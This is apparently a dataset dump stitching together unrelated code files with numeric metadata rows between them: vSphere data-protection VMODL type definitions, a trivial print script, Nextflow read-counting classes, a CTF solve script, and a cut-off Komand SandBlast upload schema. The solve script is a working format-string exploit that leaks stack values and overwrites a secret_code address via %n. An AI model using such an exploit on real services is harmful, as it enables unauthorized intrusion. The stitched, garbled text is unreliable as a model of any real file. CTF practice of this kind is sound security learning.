CreateDataType("dp.telemetry.TelemetryStats.SnapshotOpMetricResult", "DpTelemetryTelemetryStatsSnapshotOpMetricResult", "dp.telemetry.TelemetryStats.MetricResult", "dp.version.VSPHERE_DP_TELEMETRY", None)
CreateDataType("dp.telemetry.TelemetryStats.SyncOpMetricResult", "DpTelemetryTelemetryStatsSyncOpMetricResult", "dp.telemetry.TelemetryStats.MetricResult", "dp.version.VSPHERE_DP_TELEMETRY", [("lwdSyncTypeIndexTable", "vim.KeyValue[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL)])
CreateDataType("dp.telemetry.TelemetryStats.MetricInfo", "DpTelemetryTelemetryStatsMetricInfo", "vmodl.DynamicData", "dp.version.VSPHERE_DP_TELEMETRY", [("name", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("description", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("unit", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0), ("category", "string", "dp.version.VSPHERE_DP_TELEMETRY", 0)])
# --- Local-disk protected-entity types ------------------------------------
# Local-disk counterparts of the VirtualMachine* types above: protected
# entity identified by id/path rather than a VM reference.
CreateDataType("dp.LocalDiskProtectedEntity", "DpLocalDiskProtectedEntity", "dp.ProtectedEntity", "dp.version.version1", [("id", "string", "dp.version.version1", 0), ("disks", "dp.LocalDiskProtectedEntity.Disk[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.LocalDiskProtectedEntity.Disk", "DpLocalDiskProtectedEntityDisk", "vmodl.DynamicData", "dp.version.version1", [("uuid", "string", "dp.version.version1", 0), ("path", "string", "dp.version.version1", 0)])
CreateDataType("dp.LocalDiskUserIdBinding", "DpLocalDiskUserIdBinding", "dp.UserIdBinding", "dp.version.version1", [("diskIds", "dp.LocalDiskUserIdBinding.DiskIdBinding[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.LocalDiskUserIdBinding.DiskIdBinding", "DpLocalDiskUserIdBindingDiskIdBinding", "vmodl.DynamicData", "dp.version.version1", [("path", "string", "dp.version.version1", 0), ("id", "string", "dp.version.version1", 0)])
# --- dp.ProtectionService managed object ----------------------------------
# Single generated statement (spans two physical lines) registering the
# ProtectionService with its methods: retireSnapshot, cancelSnapshot,
# snapshot, sync, PrepareRestore, CommitRestore, and the telemetry queries
# QueryMetricCategories / GetMetricInfo / QueryMetrics.  Do not edit by
# hand — regenerate from the VMODL definitions instead.
CreateManagedType("dp.ProtectionService", "DpProtectionService", "vmodl.ManagedObject", "dp.version.version1", None, [("retireSnapshot", "RetireSnapshot", "dp.version.version1", (("spec", "dp.ProtectionService.RetireSnapshotOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.RetireSnapshotOp", "dp.ProtectionService.RetireSnapshotOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("cancelSnapshot", "CancelSnapshot", "dp.version.version1", (("spec", "dp.ProtectionService.CancelSnapshotOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.CancelSnapshotOp", "dp.ProtectionService.CancelSnapshotOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("snapshot", "Snapshot", "dp.version.version1", (("spec", "dp.ProtectionService.SnapshotOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.SnapshotOp", "dp.ProtectionService.SnapshotOp"), None, ["vim.fault.InvalidHostState", ]), ("sync", "Sync", "dp.version.version1", (("spec", "dp.ProtectionService.SyncOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.SyncOp", "dp.ProtectionService.SyncOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("PrepareRestore", "PrepareRestore", "dp.version.version1", (("spec", "dp.ProtectionService.PrepareRestoreOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.PrepareRestoreOp", "dp.ProtectionService.PrepareRestoreOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("CommitRestore", "CommitRestore", "dp.version.version1", (("spec", "dp.ProtectionService.CommitRestoreOp.Spec", "dp.version.version1", 0, None),), (0, "dp.ProtectionService.CommitRestoreOp", "dp.ProtectionService.CommitRestoreOp"), None, ["vim.fault.NotFound", "vim.fault.InvalidHostState", ]), ("QueryMetricCategories", "QueryMetricCategories", "dp.version.VSPHERE_DP_TELEMETRY", (), (F_OPTIONAL, "string[]", "string[]"), None, None), ("GetMetricInfo", "GetMetricInfo", 
"dp.version.VSPHERE_DP_TELEMETRY", (("metrics", "string[]", "dp.version.VSPHERE_DP_TELEMETRY", F_OPTIONAL, None),), (F_OPTIONAL, "dp.telemetry.TelemetryStats.MetricInfo[]", "dp.telemetry.TelemetryStats.MetricInfo[]"), None, None), ("QueryMetrics", "QueryMetrics", "dp.version.VSPHERE_DP_TELEMETRY", (("spec", "dp.telemetry.TelemetryStats.QueryMetricsSpec", "dp.version.VSPHERE_DP_TELEMETRY", 0, None),), (F_OPTIONAL, "dp.telemetry.TelemetryStats.MetricResults", "dp.telemetry.TelemetryStats.MetricResults"), None, None)])
# --- dp.ProtectionService nested enums and operation types ----------------
# Snapshot/VSS enums, then the SnapshotOp / RetireSnapshotOp /
# CancelSnapshotOp / SyncOp operation types, each with nested Spec and
# Result data types.
CreateEnumType("dp.ProtectionService.SnapshotType", "DpProtectionServiceSnapshotType", "dp.version.version1", ["crashConsistent", "applicationConsistent", "vssAppConsistentFull", "vssAppConsistentCopy", "metadataOnly", "vssAppConsistent"])
CreateEnumType("dp.ProtectionService.VssBackupType", "DpProtectionServiceVssBackupType", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", ["vssBackupTypeFull", "vssBackupTypeCopy"])
CreateEnumType("dp.ProtectionService.VssBackupContext", "DpProtectionServiceVssBackupContext", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", ["vssBackupContextAuto", "vssBackupContextBackup", "vssBackupContextFileShareBackup"])
CreateDataType("dp.ProtectionService.VssBackupSpec", "DpProtectionServiceVssBackupSpec", "vmodl.DynamicData", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", [("vssBackupType", "string", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", 0), ("vssBackupContext", "string", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", 0), ("timeout", "int", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", F_OPTIONAL)])
# SnapshotOp and its Spec/Result/TaskResult.
CreateDataType("dp.ProtectionService.SnapshotOp", "DpProtectionServiceSnapshotOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.SnapshotOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SnapshotOp.Spec", "DpProtectionServiceSnapshotOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("peSnapshotType", "string", "dp.version.v8_0_0_0", F_OPTIONAL), ("snapshotType", "dp.ProtectionService.SnapshotType", "dp.version.version1", F_OPTIONAL), ("baseSnapshotId", "string", "dp.version.version1", F_OPTIONAL), ("basePeSnapshot", "dp.ProtectedEntitySnapshot", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", F_OPTIONAL), ("vssBackupSpec", "dp.ProtectionService.VssBackupSpec", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.SnapshotOp.Result", "DpProtectionServiceSnapshotOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SnapshotOp.TaskResult", "DpProtectionServiceSnapshotOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("associatedFiles", "string[]", "dp.version.version1", F_OPTIONAL)])
# RetireSnapshotOp and its Spec/Result.
CreateDataType("dp.ProtectionService.RetireSnapshotOp", "DpProtectionServiceRetireSnapshotOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.RetireSnapshotOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.RetireSnapshotOp.Spec", "DpProtectionServiceRetireSnapshotOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.RetireSnapshotOp.Result", "DpProtectionServiceRetireSnapshotOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
# CancelSnapshotOp and its Spec/Result.
CreateDataType("dp.ProtectionService.CancelSnapshotOp", "DpProtectionServiceCancelSnapshotOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.CancelSnapshotOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CancelSnapshotOp.Spec", "DpProtectionServiceCancelSnapshotOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CancelSnapshotOp.Result", "DpProtectionServiceCancelSnapshotOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
# SyncOp and its Spec (Result type continues past this section).
CreateEnumType("dp.ProtectionService.SyncType", "DpProtectionServiceSyncType", "dp.version.version1", ["fullSync", "deltaSync"])
CreateDataType("dp.ProtectionService.SyncOp", "DpProtectionServiceSyncOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.SyncOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SyncOp.Spec", "DpProtectionServiceSyncOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("transportProvider", "string", "dp.version.version1", 0), ("transportProviderOptions", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL), ("userIds", "dp.UserIdBinding", "dp.version.version1", F_OPTIONAL), ("synchronizationType", "string", "dp.version.v8_0_0_0", F_OPTIONAL), ("syncType", "dp.ProtectionService.SyncType", "dp.version.version1", F_OPTIONAL), ("initiatorId", "string", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.SyncOp.Result", "DpProtectionServiceSyncOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.SyncOp.TaskResult", "DpProtectionServiceSyncOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp", "DpProtectionServicePrepareRestoreOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.PrepareRestoreOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp.Spec", "DpProtectionServicePrepareRestoreOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("transportProvider", "string", "dp.version.version1", 0), ("transportProviderOptions", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL), ("userIds", "dp.UserIdBinding", "dp.version.version1", F_OPTIONAL), ("initiatorId", "string", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp.Result", "DpProtectionServicePrepareRestoreOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.PrepareRestoreOp.TaskResult", "DpProtectionServicePrepareRestoreOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.CommitRestoreOp", "DpProtectionServiceCommitRestoreOp", "vmodl.DynamicData", "dp.version.version1", [("result", "dp.ProtectionService.CommitRestoreOp.Result", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CommitRestoreOp.Spec", "DpProtectionServiceCommitRestoreOpSpec", "vmodl.DynamicData", "dp.version.version1", [("pe", "dp.ProtectedEntity", "dp.version.version1", 0), ("transportProvider", "string", "dp.version.version1", 0), ("transportProviderOptions", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL), ("userIds", "dp.UserIdBinding", "dp.version.version1", F_OPTIONAL), ("initiatorId", "string", "dp.version.version1", 0), ("snapshotId", "string", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.ProtectionService.CommitRestoreOp.Result", "DpProtectionServiceCommitRestoreOpResult", "vmodl.DynamicData", "dp.version.version1", [("task", "vim.Task", "dp.version.version1", 0)])
CreateDataType("dp.ProtectionService.CommitRestoreOp.TaskResult", "DpProtectionServiceCommitRestoreOpTaskResult", "vmodl.DynamicData", "dp.version.version1", [("transportProviderResults", "vim.KeyValue[]", "dp.version.version1", F_OPTIONAL)])
CreateDataType("dp.fault.AlreadyLoggedIn", "DpFaultAlreadyLoggedIn", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.BaseSnapshotMismatch", "DpFaultBaseSnapshotMismatch", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.CancelSnapshotRequired", "DpFaultCancelSnapshotRequired", "dp.fault.DpFault", "dp.version.version1", None)
CreateDataType("dp.fault.DiskClosing", "DpFaultDiskClosing", "dp.fault.DpFault", "dp.version.version1", None)
| 76.359013
| 2,514
| 0.815153
| 42,975
| 358,811
| 6.619756
| 0.012379
| 0.263108
| 0.366671
| 0.053876
| 0.96687
| 0.956331
| 0.757726
| 0.595316
| 0.436404
| 0.214047
| 0
| 0.036482
| 0.029358
| 358,811
| 4,698
| 2,515
| 76.375266
| 0.78035
| 0.000164
| 0
| 0
| 1
| 0
| 0.660728
| 0.433982
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001704
| 0
| 0.001704
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
79f08b430a59bbb58547868268f8a33630753836
| 92
|
py
|
Python
|
test2.py
|
Ambareezh/pyneta
|
a64a2c213847bdec0af4064730c2c6f1d47575c7
|
[
"Apache-2.0"
] | null | null | null |
test2.py
|
Ambareezh/pyneta
|
a64a2c213847bdec0af4064730c2c6f1d47575c7
|
[
"Apache-2.0"
] | null | null | null |
test2.py
|
Ambareezh/pyneta
|
a64a2c213847bdec0af4064730c2c6f1d47575c7
|
[
"Apache-2.0"
] | null | null | null |
# Emit the greeting seven times, exactly as the original repeated statements did.
for _ in range(7):
    print("Hai")
| 10.222222
| 12
| 0.608696
| 14
| 92
| 4
| 0.142857
| 1
| 1.392857
| 1.714286
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.086957
| 92
| 8
| 13
| 11.5
| 0.666667
| 0
| 0
| 1
| 0
| 0
| 0.228261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 14
|
79f1edbb88a6a6afd2bb91b0da8def96b8a50377
| 4,325
|
py
|
Python
|
readCounters.py
|
szabogtamas/commonNFnodes
|
1244328723c1e32a98e7d194bce3bf1028822eaa
|
[
"MIT"
] | null | null | null |
readCounters.py
|
szabogtamas/commonNFnodes
|
1244328723c1e32a98e7d194bce3bf1028822eaa
|
[
"MIT"
] | null | null | null |
readCounters.py
|
szabogtamas/commonNFnodes
|
1244328723c1e32a98e7d194bce3bf1028822eaa
|
[
"MIT"
] | null | null | null |
from nodePrototypes import nextflowCmdProcess
class countWithFeatureCounts(nextflowCmdProcess):
    """Nextflow process node that counts reads with FeatureCounts using general settings."""

    def directives(self):
        # Publish the resulting table and request the many-CPU executor label.
        return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}

    def customize_features(self):
        # Channels the process consumes.
        self.inputs = [
            "val manycpu from params.manycpu",
            "val count_file from params.count_file",
            "val genomeannotation from params.genomeannotation",
            "file alignedSams from aligned.collect()",
        ]
        # Channel the process produces.
        self.outputs = ["file 'counts.tsv' into count_file"]
        # Assemble the shell command from its fragments in a single pass.
        self.command = "".join((
            "featureCounts -T $manycpu\\\n ",
            "-a $genomeannotation\\\n ",
            "-o $count_file\\\n ",
            "${alignedSams.join(' ')}\\\n",
        ))
        return None
class countSymbolsWithFeatureCounts(nextflowCmdProcess):
    """Nextflow process node that counts reads with FeatureCounts, grouping by gene symbol."""

    def directives(self):
        # Publish the resulting table and request the many-CPU executor label.
        return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}

    def customize_features(self):
        # Channels the process consumes.
        self.inputs = [
            "val manycpu from params.manycpu",
            "val count_file from params.count_file",
            "val genomeannotation from params.genomeannotation",
            "file alignedSams from aligned.collect()",
        ]
        # Channel the process produces.
        self.outputs = ["file 'counts.tsv' into count_file"]
        # Assemble the shell command from its fragments in a single pass;
        # '-g gene_name' makes FeatureCounts aggregate by gene symbol.
        self.command = "".join((
            "featureCounts -T $manycpu\\\n ",
            "-a $genomeannotation\\\n ",
            "-o $count_file\\\n ",
            "-g gene_name\\\n ",
            "${alignedSams.join(' ')}\\\n",
        ))
        return None
class countWithHTSeqCounts(nextflowCmdProcess):
    """Nextflow process node that counts reads with HTSeqCounts using general settings."""

    def directives(self):
        # Publish the resulting table and request the many-CPU executor label.
        return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}

    def customize_features(self):
        # Channels the process consumes.
        self.inputs = [
            "val manycpu from params.manycpu",
            "val count_file from params.count_file",
            "val genomeannotation from params.genomeannotation",
            "file alignedSams from aligned.collect()",
        ]
        # Channel the process produces.
        self.outputs = ["file 'counts.tsv' into count_file"]
        # Assemble the shell command from its fragments in a single pass.
        self.command = "".join((
            "htseq-count\\\n ",
            "-o $count_file\\\n ",
            "${alignedSams.join(' ')} ",
            "$genomeannotation\\\n",
        ))
        return None
class countWithSalmon(nextflowCmdProcess):
    """Nextflow process node that counts reads with Salmon (mapping-based mode).

    Consumes trimmed FASTQ files and a Salmon index; produces a per-sample
    count table published to '../tables'.
    """

    def directives(self):
        # Publish the resulting table and request the many-CPU executor label.
        return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}

    def customize_features(self):
        # BUG FIX: the original list was missing the comma after the
        # 'genomeindex' entry, so Python's implicit string concatenation
        # silently merged it with the following 'tuple sample ...' entry,
        # producing one malformed input declaration instead of two.
        self.inputs = [
            "val manycpu from params.manycpu",
            # e.g. /home/szabo/myScratch/SeqmiRNA/indices/salmon
            "val genomeindex from params.genomeindex",
            'tuple sample, "${sample}_trimed.fastq" from trimmed_fastqs',
        ]
        # NOTE(review): the output references ${alignedSams}, which is not an
        # input of this process — presumably it should use ${sample}; confirm
        # against the workflow before relying on the output file name.
        self.outputs = ["file '${alignedSams}_counts.tsv' into count_file"]
        self.command = "salmon quant\\\n "
        self.command += "-p $manycpu -l A\\\n "
        self.command += "--validateMappings\\\n "
        self.command += "-r ${alignedSams.join(' ')}\\\n "
        self.command += "-o $count_file\\\n"
        return None
class countWithSalmonAligned(nextflowCmdProcess):
    """Nextflow process node that counts reads with Salmon in alignment mode.

    Consumes collected aligned SAM files and a transcriptome FASTA; produces
    a count table published to '../tables'.
    """

    def directives(self):
        # Publish the resulting table and request the many-CPU executor label.
        return {"publishDir": "'../tables', mode: 'copy'", "label": "'manycpu'"}

    def customize_features(self):
        # BUG FIX: the original list was missing the comma after the
        # 'genomeindex' entry, so Python's implicit string concatenation
        # silently merged it with the following 'file alignedSams ...' entry,
        # producing one malformed input declaration instead of two.
        self.inputs = [
            "val manycpu from params.manycpu",
            # e.g. salmon.fa
            "val genomeindex from params.genomeindex",
            "file alignedSams from aligned.collect()",
        ]
        self.outputs = ["file 'counts.tsv' into count_file"]
        self.command = "salmon quant\\\n "
        self.command += "-t $genomeindex -l A\\\n "
        self.command += "-p $manycpu -l A\\\n "
        # NOTE(review): '-a ${sample}_trimed.fastq' references 'sample', which
        # is not declared as an input of this process — verify against caller.
        self.command += "-a ${sample}_trimed.fastq\\\n "
        self.command += "-o $count_file\\\n"
        return None
| 40.046296
| 106
| 0.574566
| 428
| 4,325
| 5.745327
| 0.175234
| 0.102887
| 0.082961
| 0.065067
| 0.807645
| 0.806832
| 0.806832
| 0.806832
| 0.767792
| 0.716958
| 0
| 0
| 0.28763
| 4,325
| 107
| 107
| 40.420561
| 0.798117
| 0.080694
| 0
| 0.724138
| 0
| 0
| 0.500352
| 0.054264
| 0
| 0
| 0
| 0
| 0
| 1
| 0.114943
| false
| 0
| 0.011494
| 0.057471
| 0.298851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
031bb2a444a04924385f6f1cc40279d134378e0c
| 940
|
py
|
Python
|
pwn/mission-control/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | 3
|
2021-07-25T11:01:21.000Z
|
2022-03-28T13:31:36.000Z
|
pwn/mission-control/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
pwn/mission-control/solve.py
|
zeyu2001/STANDCON-Challenges
|
ba302a01e0f644c7fc84ca6c64f24ad5b4a082e0
|
[
"MIT"
] | null | null | null |
from pwn import *
# Format-string exploit in three stages against a service on localhost:50000.
# The service echoes input after the fixed prefix "I am not a robotBB".

# Stage 1: Bruteforce the index of the buffer — dump many stack words with
# repeated %x specifiers to see where the controlled buffer sits on the stack.
conn = remote("localhost", 50000)
print(conn.recv())
# NOTE(review): this send() passes a str while the later stages pass bytes;
# pwntools will encode it, but the inconsistency is worth normalizing.
conn.send("I am not a robotBBAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x\r\n")
print(conn.recv())

# Stage 2: Check the index of the buffer — %11$p should print the 'AAAA'
# marker if the buffer is the 11th argument on the stack.
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBBAAAA%11$p\r\n")
print(conn.recv())

# Stage 3: Overwrite the secret_code address — place the target address
# (0x080dffbc, little-endian) in the buffer, pad the output to the desired
# byte count with %168x, then write it with %11$n.
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBB\xbc\xff\x0d\x08%168x%11$n\r\n")  # 080dffbc
print(conn.recv())
# Drop into an interactive session to use the unlocked service.
conn.interactive()
| 33.571429
| 451
| 0.543617
| 229
| 940
| 2.227074
| 0.170306
| 0.537255
| 0.8
| 1.058824
| 0.756863
| 0.641176
| 0.641176
| 0.641176
| 0.641176
| 0.641176
| 0
| 0.032147
| 0.073404
| 940
| 27
| 452
| 34.814815
| 0.553387
| 0.11383
| 0
| 0.642857
| 0
| 0.142857
| 0.657005
| 0.560386
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.428571
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
0358eae2f48244ea38079cd899289776007b52c3
| 11,080
|
py
|
Python
|
checkpoint_sand_blast/komand_checkpoint_sand_blast/actions/upload/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
checkpoint_sand_blast/komand_checkpoint_sand_blast/actions/upload/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
checkpoint_sand_blast/komand_checkpoint_sand_blast/actions/upload/schema.py
|
xhennessy-r7/insightconnect-plugins
|
59268051313d67735b5dd3a30222eccb92aca8e9
|
[
"MIT"
] | null | null | null |
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Input:
    # Keys of the action's input parameters, matching the property names in
    # the JSON schema consumed by UploadInput below.
    FILE_BYTES = "file_bytes"
    FILE_NAME = "file_name"
    FILE_TYPE = "file_type"
class Output:
    # Key of the action's single output value, matching the property name in
    # the JSON schema consumed by UploadOutput below.
    RESULTS = "results"
class UploadInput(komand.Input):
    # SDK-generated JSON schema for the upload action's input: 'file_name'
    # and 'file_bytes' are required; 'file_type' is optional.
    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "file_bytes": {
      "type": "string",
      "title": "File Bytes",
      "displayType": "bytes",
      "description": "The file bytes",
      "format": "bytes",
      "order": 3
    },
    "file_name": {
      "type": "string",
      "title": "File Name",
      "description": "The name of the file",
      "order": 1
    },
    "file_type": {
      "type": "string",
      "title": "File Type",
      "description": "File extension e.g. docx, pdf, ect",
      "order": 2
    }
  },
  "required": [
    "file_name",
    "file_bytes"
  ]
}
  """)

    def __init__(self):
        # Hand the parsed schema to the komand.Input base class.
        super(self.__class__, self).__init__(self.schema)
class UploadOutput(komand.Output):
    # SDK-generated JSON schema for the upload action's output. The single
    # 'results' property is an 'upload_response' object; the (repetitive,
    # generator-duplicated) definitions describe the nested threat-emulation
    # report structure returned by the service.
    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "results": {
      "$ref": "#/definitions/upload_response",
      "title": "Results",
      "description": "Results from the upload",
      "order": 1
    }
  },
  "definitions": {
    "images": {
      "type": "object",
      "title": "images",
      "properties": {
        "id": {
          "type": "string",
          "title": "Id",
          "order": 3
        },
        "report": {
          "$ref": "#/definitions/report",
          "title": "Report",
          "order": 1
        },
        "revision": {
          "type": "integer",
          "title": "Revision",
          "order": 4
        },
        "status": {
          "type": "string",
          "title": "Status",
          "order": 2
        }
      },
      "definitions": {
        "report": {
          "type": "object",
          "title": "report",
          "properties": {
            "verdict": {
              "type": "string",
              "title": "Verdict",
              "order": 1
            }
          }
        }
      }
    },
    "report": {
      "type": "object",
      "title": "report",
      "properties": {
        "verdict": {
          "type": "string",
          "title": "Verdict",
          "order": 1
        }
      }
    },
    "status": {
      "type": "object",
      "title": "status",
      "properties": {
        "code": {
          "type": "integer",
          "title": "Code",
          "order": 1
        },
        "label": {
          "type": "string",
          "title": "Label",
          "order": 2
        },
        "message": {
          "type": "string",
          "title": "Message",
          "order": 3
        }
      }
    },
    "threat_emulation": {
      "type": "object",
      "title": "threat_emulation",
      "properties": {
        "combined_verdict": {
          "type": "string",
          "title": "Combined Verdict",
          "order": 3
        },
        "images": {
          "type": "array",
          "title": "Images",
          "items": {
            "$ref": "#/definitions/images"
          },
          "order": 2
        },
        "score": {
          "type": "integer",
          "title": "Score",
          "order": 4
        },
        "status": {
          "$ref": "#/definitions/status",
          "title": "Status",
          "order": 5
        },
        "trust": {
          "type": "integer",
          "title": "Trust",
          "order": 1
        }
      },
      "definitions": {
        "images": {
          "type": "object",
          "title": "images",
          "properties": {
            "id": {
              "type": "string",
              "title": "Id",
              "order": 3
            },
            "report": {
              "$ref": "#/definitions/report",
              "title": "Report",
              "order": 1
            },
            "revision": {
              "type": "integer",
              "title": "Revision",
              "order": 4
            },
            "status": {
              "type": "string",
              "title": "Status",
              "order": 2
            }
          },
          "definitions": {
            "report": {
              "type": "object",
              "title": "report",
              "properties": {
                "verdict": {
                  "type": "string",
                  "title": "Verdict",
                  "order": 1
                }
              }
            }
          }
        },
        "report": {
          "type": "object",
          "title": "report",
          "properties": {
            "verdict": {
              "type": "string",
              "title": "Verdict",
              "order": 1
            }
          }
        },
        "status": {
          "type": "object",
          "title": "status",
          "properties": {
            "code": {
              "type": "integer",
              "title": "Code",
              "order": 1
            },
            "label": {
              "type": "string",
              "title": "Label",
              "order": 2
            },
            "message": {
              "type": "string",
              "title": "Message",
              "order": 3
            }
          }
        }
      }
    },
    "upload_response": {
      "type": "object",
      "title": "upload_response",
      "properties": {
        "features": {
          "type": "array",
